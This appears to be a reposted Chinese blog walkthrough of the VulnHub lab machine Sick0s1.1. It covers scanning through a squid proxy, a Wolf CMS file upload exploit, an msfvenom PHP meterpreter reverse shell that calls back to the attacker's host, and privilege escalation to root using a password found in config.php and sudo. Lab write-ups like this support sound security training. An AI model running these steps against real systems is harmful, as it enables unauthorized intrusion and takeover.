ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

VulnHub靶场篇13-Sick0s1.1

2021-02-07 22:33:53  阅读:335  来源: 互联网

标签:13 1.12 3128 192.168 Sick0s1.1 header VulnHub http php


靶机地址:Sick0s1.1~ VulnHub
难易程度:1.5 / 10.0

文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!

摘要:扫描出80、3128端口,设置3128代理访问80端口,信息搜集后得知为wolfcms框架,google相关漏洞信息,有文件上传和代码执行漏洞,使用msfvenom生成反向连接脚本,上传后,在本地使用msf的监听模块,获取到低权限后,根据/etc/passwd和config.php文件登录进sickos用户,直接提权

待完善地方:weevely工具连接,g++编译文件

主机探测&端口扫描

靶机ip为:192.168.1.12

端口扫描结果:

hhh@Kali2020:~$ sudo nmap -sS -p- 192.168.1.12
[sudo] hhh 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 11:07 CST
Nmap scan report for sickos (192.168.1.12)
Host is up (0.00029s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EA:11:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.47 seconds

信息搜集

这里直接访问80端口,并没有用,需要搭建代理,在firefox上面设置代理 192.168.1.12:3128

对网站进行扫描:

hhh@Kali2020:~$ nikto -h 192.168.1.12 -useproxy http://192.168.1.12:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.12
+ Target Hostname:    192.168.1.12
+ Target Port:        80
+ Proxy:              192.168.1.12:3128
+ Start Time:         2021-02-06 13:34:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 08:35:02 2015
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-02-06 13:40:21 (GMT8) (338 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

在robots.txt中有提示改网站框架为wolfcms

在google中搜索相关信息,搜索到文件上传|代码执行漏洞
Wolf CMS - Arbitrary File Upload / Execution

根据漏洞的演示进行权限获取

A)Login as regular user ( who have access upload functionality )

B)Go to this page  -
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/

C)Select upload an file option to upload Arbitary File ( filename ex:
"hello.php" )

D)Now you can access the file by here -
http://targetsite.com/wolfcms/public/hello.php

相关漏洞信息:

Wolf CMS 新旧两个版本中的文件上传漏洞分析

权限获取

之前学了weevely工具,在这里稍微使用,但是并没有用,可能一些细节知识没有掌握,也尝试使用菜刀和蚁剑进行尝试连接连接,但也没有用,过段时间再看

  1. 生成反向连接脚本reverse_tcp,设置本地kali的ip和端口号
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.15 lport=4444 -f row
  1. 写入文件shell.php

  2. 在上传页面上传该文件

192.168.1.12/wolfcms/?/admin/plugin/file_manager/browse/
  1. 本地开启监听
msfconsole	# 启动MSF
use exploit/multi/handler	# 使用模块
set payload php/meterpreter/reverse_tcp # 设置载荷
show options # 显示一些设置
set lhost 192.168.1.15
set lport 4444
expolit
  1. 在网站上打开该脚本
http://192.168.1.12/wolfcms/public/shell.php
  1. msf上面接收到反向连接的信息,输入shell即可建立连接

权限提升

这里一开始想使用dirtycow进行提权,但是靶机上没有g++,kali编译后和实际执行的环境并不一致,报错cannot execute binary file ,这个以后再分析分析

在目录下搜索到文件config.php,在里面查看到mysql密码

查看/etc/passwd文件,发现sickos用户为第一用户

尝试用刚刚的密码登录该用户

su sickos  # 切换用户

发现sickos的权限挺高

sudo -l  # 查看当前用户的sudo权限

直接进行权限获取

sudo -s  # 执行指定shell(passwd里面显示的shell)

sudo su:切换到root权限,环境也变化
sudo -s:切换到超级用户权限,但是使用原用户的环境

总结

  1. 代理3128端口
  2. wolfcms
  3. reverse_tcp
  4. /etc/passwd

参考

标签:13,1.12,3128,192.168,Sick0s1.1,header,VulnHub,http,php
来源: https://www.cnblogs.com/labster/p/14386954.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有